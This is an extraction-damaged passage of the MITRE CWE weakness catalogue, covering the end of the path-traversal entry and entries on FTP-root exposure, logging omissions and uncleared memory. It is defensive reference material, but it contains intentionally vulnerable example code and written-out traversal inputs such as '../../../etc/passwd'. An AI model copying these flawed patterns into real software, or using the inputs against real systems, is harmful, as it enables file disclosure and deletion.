or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed. + + + Architecture and Design + Operation + Attack Surface Reduction + + Store library, include, and utility files outside of the web document root, if possible. Otherwise, store them in a separate directory and use the web server's access control capabilities to prevent attackers from directly requesting them. One common practice is to define a fixed constant in each calling program, then check for the existence of the constant in the library/include file; if the constant does not exist, then the file was directly requested, and it can exit immediately. + This significantly reduces the chance of an attacker being able to bypass any protection mechanisms that are in the base program but not in the include files. It will also reduce the attack surface. + + + + Implementation + + Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success. + If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files. + Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not. + In the context of path traversal, error messages which disclose path information can help attackers craft the appropriate attack strings to move through the file system hierarchy. + + + + Operation + Implementation + Environment Hardening + When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues. + + + + + The following code could be for a social networking application in which each user's profile information is stored in a separate file. All files are stored in a single directory. + + my $dataPath = "/users/cwe/profiles";my $username = param("user");my $profilePath = $dataPath . "/" . $username; + open(my $fh, "<", $profilePath) || ExitError("profile read error: $profilePath");print "<ul>\n";while (<$fh>) {print "<li>$_</li>\n";}print "</ul>\n"; + + While the programmer intends to access files such as "/users/cwe/profiles/alice" or "/users/cwe/profiles/bob", there is no verification of the incoming user parameter. An attacker could provide a string such as: + + ../../../etc/passwd + + The program would generate a profile pathname like this: + + /users/cwe/profiles/../../../etc/passwd + + When the file is opened, the operating system resolves the "../" during path canonicalization and actually accesses this file: + + /etc/passwd + + As a result, the attacker could read the entire text of the password file. + Notice how this code also contains an error message information leak (CWE-209) if the user parameter does not produce a file that exists: the full pathname is provided. Because of the lack of output encoding of the file that is retrieved, there might also be a cross-site scripting problem (CWE-79) if profile contains any HTML, but other code would need to be examined. + + + In the example below, the path to a dictionary file is read from a system property and used to initialize a File object. + + String filename = System.getProperty("com.domain.application.dictionaryFile");File dictionaryFile = new File(filename); + + However, the path is not validated or modified to prevent it from containing relative or absolute path sequences before creating the File object. This allows anyone who can control the system property to determine what file is used. Ideally, the path should be resolved relative to some kind of application or user home directory. + + + The following code takes untrusted input and uses a regular expression to filter "../" from the input. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path. + + my $Username = GetUntrustedInput();$Username =~ s/\.\.\///;my $filename = "/home/user/" . $Username;ReadAndSendFile($filename); + + Since the regular expression does not have the /g global match modifier, it only removes the first instance of "../" it comes across. So an input value such as: + + ../../../etc/passwd + + will have the first "../" stripped, resulting in: + + ../../etc/passwd + + This value is then concatenated with the /home/user/ directory: + + /home/user/../../etc/passwd + + which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-23). + + + The following code attempts to validate a given input path by checking it against an allowlist and once validated delete the given file. In this specific case, the path is considered valid if it starts with the string "/safe_dir/". + + String path = getInputPath();if (path.startsWith("/safe_dir/")){File f = new File(path);f.delete()} + + An attacker could provide an input such as this: + + /safe_dir/../important.dat + + The software assumes that the path is valid because it starts with the "/safe_path/" sequence, but the "../" sequence will cause the program to delete the important.dat file in the parent directory + + + The following code demonstrates the unrestricted upload of a file with a Java servlet and a path traversal vulnerability. The action attribute of an HTML form is sending the upload file request to the Java servlet. + + <form action="FileUploadServlet" method="post" enctype="multipart/form-data"> + Choose a file to upload:<input type="file" name="filename"/><br/><input type="submit" name="submit" value="Submit"/> + </form> + + When submitted the Java servlet's doPost method will receive the request, extract the name of the file from the Http request header, read the file contents from the request and output the file to the local upload directory. + + public class FileUploadServlet extends HttpServlet { + + ... + protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { + + response.setContentType("text/html");PrintWriter out = response.getWriter();String contentType = request.getContentType(); + // the starting position of the boundary headerint ind = contentType.indexOf("boundary=");String boundary = contentType.substring(ind+9); + String pLine = new String();String uploadLocation = new String(UPLOAD_DIRECTORY_STRING); //Constant value + // verify that content type is multipart form dataif (contentType != null && contentType.indexOf("multipart/form-data") != -1) { + + // extract the filename from the Http headerBufferedReader br = new BufferedReader(new InputStreamReader(request.getInputStream()));...pLine = br.readLine();String filename = pLine.substring(pLine.lastIndexOf("\\"), pLine.lastIndexOf("\""));... + // output the file to the local upload directorytry { + BufferedWriter bw = new BufferedWriter(new FileWriter(uploadLocation+filename, true));for (String line; (line=br.readLine())!=null; ) {if (line.indexOf(boundary) == -1) {bw.write(line);bw.newLine();bw.flush();}} //end of for loopbw.close(); + + + } catch (IOException ex) {...}// output successful upload response HTML page + }// output unsuccessful upload response HTML pageelse{...} + }... + + } + + This code does not perform a check on the type of the file being uploaded (CWE-434). This could allow an attacker to upload any executable file or other file with malicious code. + Additionally, the creation of the BufferedWriter object is subject to relative path traversal (CWE-23). Since the code does not check the filename that is provided in the header, an attacker can use "../" sequences to write to files outside of the intended directory. Depending on the executing environment, the attacker may be able to specify arbitrary files to write to, leading to a wide variety of consequences, from code execution, XSS (CWE-79), or system crash. + + + This script intends to read a user-supplied file from the current directory. The user inputs the relative path to the file and the script uses Python's os.path.join() function to combine the path to the current working directory with the provided path to the specified file. This results in an absolute path to the desired file. If the file does not exist when the script attempts to read it, an error is printed to the user. + + + import os + import sys + def main(): + + filename = sys.argv[1] + path = os.path.join(os.getcwd(), filename) + try: + + with open(path, 'r') as f: + + file_data = f.read() + + + except FileNotFoundError as e: + + print("Error - file not found") + + + main() + + + However, if the user supplies an absolute path, the os.path.join() function will discard the path to the current working directory and use only the absolute path provided. For example, if the current working directory is /home/user/documents, but the user inputs /etc/passwd, os.path.join() will use only /etc/passwd, as it is considered an absolute path. In the above scenario, this would cause the script to access and read the /etc/passwd file. + + + import os + import sys + def main(): + + filename = sys.argv[1] + path = os.path.normpath(f"{os.getcwd()}{os.sep}{filename}") + try: + + with open(path, 'r') as f: + + file_data = f.read() + + + except FileNotFoundError as e: + + print("Error - file not found") + + + main() + + + The constructed path string uses os.sep to add the appropriate separation character for the given operating system (e.g. '\' or '/') and the call to os.path.normpath() removes any additional slashes that may have been entered - this may occur particularly when using a Windows path. By putting the pieces of the path string together in this fashion, the script avoids a call to os.path.join() and any potential issues that might arise if an absolute path is entered. With this version of the script, if the current working directory is /home/user/documents, and the user inputs /etc/passwd, the resulting path will be /home/user/documents/etc/passwd. The user is therefore contained within the current working directory as intended. + + + + + CVE-2019-20916 + Python package manager does not correctly restrict the filename specified in a Content-Disposition header, allowing arbitrary file read using path traversal sequences such as "../" + https://www.cve.org/CVERecord?id=CVE-2019-20916 + + + CVE-2022-31503 + Python package constructs filenames using an unsafe os.path.join call on untrusted input, allowing absolute path traversal because os.path.join resets the pathname to an absolute path that is specified as part of the input. + https://www.cve.org/CVERecord?id=CVE-2022-31503 + + + CVE-2022-24877 + directory traversal in Go-based Kubernetes operator app allows accessing data from the controller's pod file system via ../ sequences in a yaml file + https://www.cve.org/CVERecord?id=CVE-2022-24877 + + + CVE-2021-21972 + Chain: Cloud computing virtualization platform does not require authentication for upload of a tar format file (CWE-306), then uses .. path traversal sequences (CWE-23) in the file to access unexpected files, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2021-21972 + + + CVE-2020-4053 + a Kubernetes package manager written in Go allows malicious plugins to inject path traversal sequences into a plugin archive ("Zip slip") to copy a file outside the intended directory + https://www.cve.org/CVERecord?id=CVE-2020-4053 + + + CVE-2020-3452 + Chain: security product has improper input validation (CWE-20) leading to directory traversal (CWE-22), as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2020-3452 + + + CVE-2019-10743 + Go-based archive library allows extraction of files to locations outside of the target folder with "../" path traversal sequences in filenames in a zip file, aka "Zip Slip" + https://www.cve.org/CVERecord?id=CVE-2019-10743 + + + CVE-2010-0467 + Newsletter module allows reading arbitrary files using "../" sequences. + https://www.cve.org/CVERecord?id=CVE-2010-0467 + + + CVE-2009-4194 + FTP server allows deletion of arbitrary files using ".." in the DELE command. + https://www.cve.org/CVERecord?id=CVE-2009-4194 + + + CVE-2009-4053 + FTP server allows creation of arbitrary directories using ".." in the MKD command. + https://www.cve.org/CVERecord?id=CVE-2009-4053 + + + CVE-2009-0244 + FTP service for a Bluetooth device allows listing of directories, and creation or reading of files using ".." sequences. + https://www.cve.org/CVERecord?id=CVE-2009-0244 + + + CVE-2009-4013 + Software package maintenance program allows overwriting arbitrary files using "../" sequences. + https://www.cve.org/CVERecord?id=CVE-2009-4013 + + + CVE-2009-4449 + Bulletin board allows attackers to determine the existence of files using the avatar. + https://www.cve.org/CVERecord?id=CVE-2009-4449 + + + CVE-2009-4581 + PHP program allows arbitrary code execution using ".." in filenames that are fed to the include() function. + https://www.cve.org/CVERecord?id=CVE-2009-4581 + + + CVE-2010-0012 + Overwrite of files using a .. in a Torrent file. + https://www.cve.org/CVERecord?id=CVE-2010-0012 + + + CVE-2010-0013 + Chat program allows overwriting files using a custom smiley request. + https://www.cve.org/CVERecord?id=CVE-2010-0013 + + + CVE-2008-5748 + Chain: external control of values for user's desired language and theme enables path traversal. + https://www.cve.org/CVERecord?id=CVE-2008-5748 + + + CVE-2009-1936 + Chain: library file sends a redirect if it is directly requested but continues to execute, allowing remote file inclusion and path traversal. + https://www.cve.org/CVERecord?id=CVE-2009-1936 + + + + File Processing + + + File or Directory + + + + Path Traversal + + + A4 + Insecure Direct Object Reference + CWE More Specific + + + A2 + Broken Access Control + CWE More Specific + + + FIO02-C + Canonicalize path names originating from untrusted sources + + + IDS00-PL + Canonicalize path names before validating them + Exact + + + 33 + Path Traversal + + + SFP16 + Path Traversal + + + ASCSM-CWE-22 + + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Pathname equivalence can be regarded as a type of canonicalization error. + Some pathname equivalence issues are not directly related to directory traversal, rather are used to bypass security-relevant checks for whether a file/directory can be accessed by the attacker (e.g. a trailing "/" on a filename could bypass access rules that don't expect a trailing /, causing a server to provide the file when it normally would not). + + Like other weaknesses, terminology is often based on the types of manipulations used, instead of the underlying weaknesses. Some people use "directory traversal" only to refer to the injection of ".." and equivalent sequences whose specific meaning is to traverse directories. + Other variants like "absolute pathname" and "drive letter" have the *effect* of directory traversal, but some people may not call it such, since it doesn't involve ".." or equivalent. + + Many variants of path traversal attacks are probably under-studied with respect to root cause. CWE-790 and CWE-182 begin to cover part of this gap. + + Incomplete diagnosis or reporting of vulnerabilities can make it difficult to know which variant is affected. For example, a researcher might say that "..\" is vulnerable, but not test "../" which may also be vulnerable. + Any combination of directory separators ("/", "\", etc.) and numbers of "." (e.g. "....") can produce unique variants; for example, the "//../" variant is not listed (CVE-2004-0325). See this entry's children and lower-level descendants. + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Alternate_Terms, Relationships, Other_Notes, Relationship_Notes, Relevant_Properties, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-02-16 + updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Likelihood_of_Exploit, Name, Observed_Examples, Other_Notes, Potential_Mitigations, References, Related_Attack_Patterns, Relationship_Notes, Relationships, Research_Gaps, Taxonomy_Mappings, Terminology_Notes, Time_of_Introduction, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2010-06-21 + updated Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2010-09-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-12-13 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Observed_Examples + + + CWE Content Team + MITRE + 2013-07-17 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2014-06-23 + updated Other_Notes, Research_Gaps + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-05-03 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2017-11-08 + updated Affected_Resources, Causal_Nature, Likelihood_of_Exploit, References, Relationships, Relevant_Properties, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships, Type + + + CWE Content Team + MITRE + 2019-09-19 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2022-06-28 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Observed_Examples, References + + + CWE Content Team + MITRE + 2023-01-31 + updated Common_Consequences, Description, Detection_Factors + + + CWE Content Team + MITRE + 2023-04-27 + updated Demonstrative_Examples, References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + Nick Johnston + 2022-07-11 + Identified weakness in Perl demonstrative example + + Path Traversal + + + + The product stores sensitive data under the FTP server root with insufficient access control, which might make it accessible to untrusted parties. + + + + + + + + Various Unix FTP servers require a password file that is under the FTP root, due to use of chroot. + + + + Operation + + + Architecture and Design + COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. + + + + + Confidentiality + Read Application Data + + + + + Implementation + System Configuration + Avoid storing information under the FTP root directory. + + + System Configuration + Access control permissions should be set to prevent reading/writing of sensitive files inside/outside of the FTP directory. + + + + + Sensitive Data Under FTP Root + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Background_Details, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Sensitive Data Under FTP Root + + + + The product does not record, or improperly records, security-relevant information that leads to an incorrect decision or hampers later analysis. + This can be resultant, e.g. a buffer overflow might trigger a crash before the product can log the event. + + + + + + + + + Architecture and Design + + + Implementation + + + Operation + + + + + Non-Repudiation + Hide Activities + + + + + Information loss or omission + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product truncates the display, recording, or processing of security-relevant information in a way that can obscure the source or nature of an attack. + + + + + + + + + Implementation + + + Operation + + + + + Non-Repudiation + Hide Activities + The source of an attack will be difficult or impossible to determine. This can allow attacks to the system to continue without notice. + + + + + CVE-2005-0585 + Web browser truncates long sub-domains or paths, facilitating phishing. + https://www.cve.org/CVERecord?id=CVE-2005-0585 + + + CVE-2004-2032 + Bypass URL filter via a long URL with a large number of trailing hex-encoded space characters. + https://www.cve.org/CVERecord?id=CVE-2004-2032 + + + CVE-2003-0412 + Does not log complete URI of a long request (truncation). + https://www.cve.org/CVERecord?id=CVE-2003-0412 + + + + + Truncation of Security-relevant Information + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not record or display information that would be important for identifying the source or nature of an attack, or determining if an action is safe. + + + + + + + + + Architecture and Design + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + Implementation + + + Operation + + + + + Non-Repudiation + Hide Activities + The source of an attack will be difficult or impossible to determine. This can allow attacks to the system to continue without notice. + + + + + This code logs suspicious multiple login attempts. + + function login($userName,$password){ + if(authenticate($userName,$password)){return True;}else{incrementLoginAttempts($userName);if(recentLoginAttempts($userName) > 5){writeLog("Failed login attempt by User: " . $userName . " at " + date('r') );}} + } + + This code only logs failed login attempts when a certain limit is reached. If an attacker knows this limit, they can stop their attack from being discovered by avoiding the limit. + + + + + CVE-1999-1029 + Login attempts not recorded if user disconnects before maximum number of tries. + https://www.cve.org/CVERecord?id=CVE-1999-1029 + + + CVE-2002-1839 + Sender's IP address not recorded in outgoing e-mail. + https://www.cve.org/CVERecord?id=CVE-2002-1839 + + + CVE-2000-0542 + Failed authentication attempt not recorded if later attempt succeeds. + https://www.cve.org/CVERecord?id=CVE-2000-0542 + + + + + Omission of Security-relevant Information + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, References, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Demonstrative_Examples, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product records security-relevant information according to an alternate name of the affected entity, instead of the canonical name. + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Operation + + + + + Non-Repudiation + Access Control + Hide Activities + Gain Privileges or Assume Identity + + + + + This code prints the contents of a file if a user has permission. + + function readFile($filename){ + $user = getCurrentUser();$realFile = $filename; + + //resolve file if its a symbolic link + if(is_link($filename)){$realFile = readlink($filename);} + if(fileowner($realFile) == $user){echo file_get_contents($realFile);return;}else{echo 'Access denied';writeLog($user . ' attempted to access the file '. $filename . ' on '. date('r'));} + } + + While the code logs a bad access attempt, it logs the user supplied name for the file, not the canonicalized file name. An attacker can obscure their target by giving the script the name of a link to the file they are attempting to access. Also note this code contains a race condition between the is_link() and readlink() functions (CWE-363). + + + + + CVE-2002-0725 + Attacker performs malicious actions on a hard link to a file, obscuring the real target file. + https://www.cve.org/CVERecord?id=CVE-2002-0725 + + + + + Obscured Security-relevant Information by Alternate Name + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Demonstrative_Examples, Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This weakness can be found at CWE-199. + + Prohibited + This CWE has been deprecated. + See description and name for possible suggestions of other CWEs to consider. + + + + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Name + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + DEPRECATED (Duplicate): General Information Management Problems + + + + The product releases a resource such as memory or a file so that it can be made available for reuse, but it does not clear or "zeroize" the information contained in the resource before the product performs a critical state transition or makes the resource available for reuse by other entities. + + When resources are released, they can be made available for reuse. For example, after memory is de-allocated, an operating system may make the memory available to another process, or disk space may be reallocated when a file is deleted. As removing information requires time and additional resources, operating systems do not usually clear the previously written information. + Even when the resource is reused by the same process, this weakness can arise when new data is not as large as the old data, which leaves portions of the old data still available. Equivalent errors can occur in other situations where the length of data is variable but the associated data structure is not. If memory is not cleared after use, the information may be read by less trustworthy parties when the memory is reallocated. + This weakness can apply in hardware, such as when a device or system switches between power, sleep, or debug states during normal operation, or when execution changes to different users or privilege levels. + + + + + + + + + Primary + + + + + + + + + Implementation + + + + + Confidentiality + Read Application Data + + + + + Manual Analysis + Write a known pattern into each sensitive location. Trigger the release of the resource or cause the desired state transition to occur. Read data back from the sensitive locations. If the reads are successful, and the data is the same as the pattern that was originally written, the test fails and the product needs to be fixed. Note that this test can likely be automated. + High + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Implementation + During critical state transitions, information not needed in the next state should be removed or overwritten with fixed patterns (such as all 0's) or random data, before the transition to the next state. + High + + + Architecture and Design + Implementation + When releasing, de-allocating, or deleting a resource, overwrite its data and relevant metadata with fixed patterns or random data. Be cautious about complex resource types whose underlying representation might be non-contiguous or change at a low level, such as how a file might be split into different chunks on a file system, even though "logical" file positions are contiguous at the application layer. Such resource types might require invocation of special modes or APIs to tell the underlying operating system to perform the necessary clearing, such as SDelete (Secure Delete) on Windows, although the appropriate functionality might not be available at the application layer. + High + + + + + This example shows how an attacker can take advantage of an incorrect state transition. + + Suppose a device is transitioning from state A to state B. During state A, it can read certain private keys from the hidden fuses that are only accessible in state A but not in state B. The device reads the keys, performs operations using those keys, then transitions to state B, where those private keys should no longer be accessible. + + + During the transition from A to B, the device does not scrub the memory. + + After the transition to state B, even though the private keys are no longer accessible directly from the fuses in state B, they can be accessed indirectly by reading the memory that contains the private keys. + For transition from state A to state B, remove information which should not be available once the transition is complete. + + + The following code calls realloc() on a buffer containing sensitive data: + + cleartext_buffer = get_secret();...cleartext_buffer = realloc(cleartext_buffer, 1024);...scrub_memory(cleartext_buffer, 1024); + + There is an attempt to scrub the sensitive data from memory, but realloc() is used, so it could return a pointer to a different part of memory. The memory that was originally allocated for cleartext_buffer could still contain an uncleared copy of the data. + + + + + CVE-2003-0001 + Ethernet NIC drivers do not pad frames with null bytes, leading to infoleak from malformed packets. + https://www.cve.org/CVERecord?id=CVE-2003-0001 + + + CVE-2003-0291 + router does not clear information from DHCP packets that have been previously used + https://www.cve.org/CVERecord?id=CVE-2003-0291 + + + CVE-2005-1406 + Products do not fully clear memory buffers when less data is stored into the buffer than previous. + https://www.cve.org/CVERecord?id=CVE-2005-1406 + + + CVE-2005-1858 + Products do not fully clear memory buffers when less data is stored into the buffer than previous. + https://www.cve.org/CVERecord?id=CVE-2005-1858 + + + CVE-2005-3180 + Products do not fully clear memory buffers when less data is stored into the buffer than previous. + https://www.cve.org/CVERecord?id=CVE-2005-3180 + + + CVE-2005-3276 + Product does not clear a data structure before writing to part of it, yielding information leak of previously used memory. + https://www.cve.org/CVERecord?id=CVE-2005-3276 + + + CVE-2002-2077 + Memory not properly cleared before reuse. + https://www.cve.org/CVERecord?id=CVE-2002-2077 + + + + Memory Management + Networking + + + Memory + + + + Sensitive Information Uncleared Before Use + + + MEM03-C + Clear sensitive information stored in reusable resources returned for reuse + + + SFP23 + Exposed Data + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + There is a close association between CWE-226 and CWE-212. The difference is partially that of perspective. CWE-226 is geared towards the final stage of the resource lifecycle, in which the resource is deleted, eliminated, expired, or otherwise released for reuse. Technically, this involves a transfer to a different control sphere, in which the original contents of the resource are no longer relevant. CWE-212, however, is intended for sensitive data in resources that are intentionally shared with others, so they are still active. This distinction is useful from the perspective of the CWE research view (CWE-1000). + This entry needs modification to clarify the differences with CWE-212. The description also combines two problems that are distinct from the CWE research perspective: the inadvertent transfer of information to another sphere, and improper initialization/shutdown. Some of the associated taxonomy mappings reflect these different uses. + This is frequently found for network packets, but it can also exist in local memory allocation, files, etc. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 